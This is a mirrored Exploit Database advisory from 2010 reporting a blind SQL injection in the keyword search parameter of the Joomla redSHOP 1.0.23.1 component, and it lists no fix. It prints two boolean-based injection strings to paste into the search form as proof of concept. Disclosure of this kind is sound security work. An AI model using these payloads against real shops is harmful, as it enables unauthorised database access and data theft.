Joomla! Component redSHOP 1.0.23.1 – Blind SQL Injection

• Exploit Database
• 6 阅读

• 作者： Salvatore Fresta
  日期： 2010-07-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14368/

• RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
  
   NameRedShop
   Vendorhttp://redweb.dk
   Versions Affected 1.0.23.1
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-07-13
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  RedShop is a popular and commercial Joomla component.
  Itisa Content Creation Kit style of webshop / webshop
  tool where you got the most access ever given to any user
  tocompletelystylearoundandchange thier webshop,
  withoutalotmore knowledge then HTML and a bit of CSS.
  
  
  II. DESCRIPTION
  _______________
  
  A parameter in the search formis not properly sanitised
  before being used in a SQL query.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Blind SQL Injection
   
  
  A) Blind SQL Injection
  ______________________
  
  The parameters viewform and id are not properly sanitised
  Theparameterkeywordis not properly sanitised before 
  beingusedinaSQLquery. Thiscan be exploited to
  manipulate SQL queries by injecting arbitrary SQL code.
  
  Successful exploitationrequires that "magic_quotes_gpc"
  is disabled. 
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Blind SQL Injection
  
  Copy and past the following lines in the search form:
  
  ' AND (SELECT(IF(ASCII(0x41) = 64,false,NULL))) OR '
  ' AND (SELECT(IF(ASCII(0x41) = 65,true,NULL))) OR '
  
  
  V. FIX
  ______
  
  No fix.